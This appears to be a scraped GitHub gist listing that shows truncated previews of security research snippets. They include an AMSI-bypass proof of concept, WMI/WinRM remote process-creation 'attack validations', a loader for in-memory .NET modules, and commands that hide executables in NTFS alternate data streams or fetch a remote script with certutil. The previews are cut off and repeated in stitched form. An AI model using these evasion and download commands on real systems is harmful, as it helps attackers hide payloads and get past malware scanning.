꿀보 kernullist

## go-sharp-loader.go
package main

/*
Example Go program with multiple .NET Binaries embedded

This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
	$ go get -u github.com/gobuffalo/packr/packr

Place all your EXEs are in a "binaries" folder

## driversipolicy.xml
<?xml version="1.0"?>
<SiPolicy xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:schemas-microsoft-com:sipolicy">
  <VersionEx>10.0.17689.0</VersionEx>
  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
  <PolicyID>{D2BDA982-CCF6-4344-AC5B-0B44427B6816}</PolicyID>
  <BasePolicyID>{D2BDA982-CCF6-4344-AC5B-0B44427B6816}</BasePolicyID>
  <Rules>
    <Rule>
      <Option>Enabled:Unsigned System Integrity Policy</Option>
    </Rule>

## HowToDetectTechniqueX_Demos.ps1
#region Attack validations
wmic /node:169.254.37.139 /user:Administrator /password:badpassword process call create notepad.exe

Invoke-WmiMethod -ComputerName 169.254.37.139 -Credential Administrator -Class Win32_Process -Name Create -ArgumentList notepad.exe

$CimSession = New-CimSession -ComputerName 169.254.37.139 -Credential Administrator
Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = 'notepad.exe' }
$CimSession | Remove-CimSession

winrm --% invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -remote:169.254.37.139 -username:Administrator -password:badpassword

## CorruptCLRGlobal.ps1
function Subvert-CLRAntiMalware {
<#
.SYNOPSIS

A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.

.DESCRIPTION

clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.

## SysmonEventGUIDParser.ps1
# Author: Matthew Graeber (@mattifestation)

$Epoch = Get-Date '01/01/1970'

# Conversion trick taken from https://blogs.technet.microsoft.com/heyscriptingguy/2017/02/01/powertip-convert-from-utc-to-my-local-time-zone/
$StrCurrentTimeZone = (Get-WmiObject Win32_timezone).StandardName
$TZ = [TimeZoneInfo]::FindSystemTimeZoneById($StrCurrentTimeZone)

# Parse out all the LogonGUID fields for sysmon ProcessCreate events
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } | ForEach-Object {

## UEFISecDatabaseParser.ps1
function Get-UEFIDatabaseSigner {
<#
.SYNOPSIS

Dumps signature or hash information for whitelisted ('db' variable) or blacklisted ('dbx' variable) UEFI bootloaders.

.DESCRIPTION

Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause

## LoadInMemoryModule.ps1
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA

## Exe_ADS_Methods.md

      
              1 file
            
          
              89 forks
            
          
                15 comments
              
            
              233 stars
            
          
                api0cradle
                / Exe_ADS_Methods.md
            
            
              Last active
              October 8, 2025 08:06
            
              
                Execute from Alternate Streams
              
          
    Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

  
## spectre.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

## zipapp.md

      
              1 file
            
          
              13 forks
            
          
                3 comments
              
            
              63 stars
            
          
                lukassup
                / zipapp.md
            
            
              Last active
              September 12, 2023 02:17
            
              
                Python zipapp
              
          
    Python zipapp web apps

What's a zipapp?
This concept is very much like .jar or .war archives in Java.

NOTE: The built .pyz zipapp can run on both Python 2 & 3 but you can only build .pyz zipapps with Python 3.5 or later.

Initial setup
	package main

	/*
	Example Go program with multiple .NET Binaries embedded

	This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
	$ go get -u github.com/gobuffalo/packr/packr

	Place all your EXEs are in a "binaries" folder
	<?xml version="1.0"?>
	<SiPolicy xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:schemas-microsoft-com:sipolicy">
	<VersionEx>10.0.17689.0</VersionEx>
	<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
	<PolicyID>{D2BDA982-CCF6-4344-AC5B-0B44427B6816}</PolicyID>
	<BasePolicyID>{D2BDA982-CCF6-4344-AC5B-0B44427B6816}</BasePolicyID>
	<Rules>
	<Rule>
	<Option>Enabled:Unsigned System Integrity Policy</Option>
	</Rule>
	#region Attack validations
	wmic /node:169.254.37.139 /user:Administrator /password:badpassword process call create notepad.exe

	Invoke-WmiMethod -ComputerName 169.254.37.139 -Credential Administrator -Class Win32_Process -Name Create -ArgumentList notepad.exe

	$CimSession = New-CimSession -ComputerName 169.254.37.139 -Credential Administrator
	Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = 'notepad.exe' }
	$CimSession \| Remove-CimSession

	winrm --% invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -remote:169.254.37.139 -username:Administrator -password:badpassword
	function Subvert-CLRAntiMalware {
	<#
	.SYNOPSIS

	A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.

	.DESCRIPTION

	clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.
	# Author: Matthew Graeber (@mattifestation)

	$Epoch = Get-Date '01/01/1970'

	# Conversion trick taken from https://blogs.technet.microsoft.com/heyscriptingguy/2017/02/01/powertip-convert-from-utc-to-my-local-time-zone/
	$StrCurrentTimeZone = (Get-WmiObject Win32_timezone).StandardName
	$TZ = [TimeZoneInfo]::FindSystemTimeZoneById($StrCurrentTimeZone)

	# Parse out all the LogonGUID fields for sysmon ProcessCreate events
	Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } \| ForEach-Object {
	function Get-UEFIDatabaseSigner {
	<#
	.SYNOPSIS

	Dumps signature or hash information for whitelisted ('db' variable) or blacklisted ('dbx' variable) UEFI bootloaders.

	.DESCRIPTION

	Author: Matthew Graeber (@mattifestation)
	License: BSD 3-Clause
	$Domain = [AppDomain]::CurrentDomain
	$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
	$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
	$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
	# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
	$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
	$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
	$TypeBuilder.CreateType()
	$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA
	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>
	#ifdef _MSC_VER
	#include <intrin.h> /* for rdtscp and clflush */
	#pragma optimize("gt",on)
	#else
	#include <x86intrin.h> /* for rdtscp and clflush */
	#endif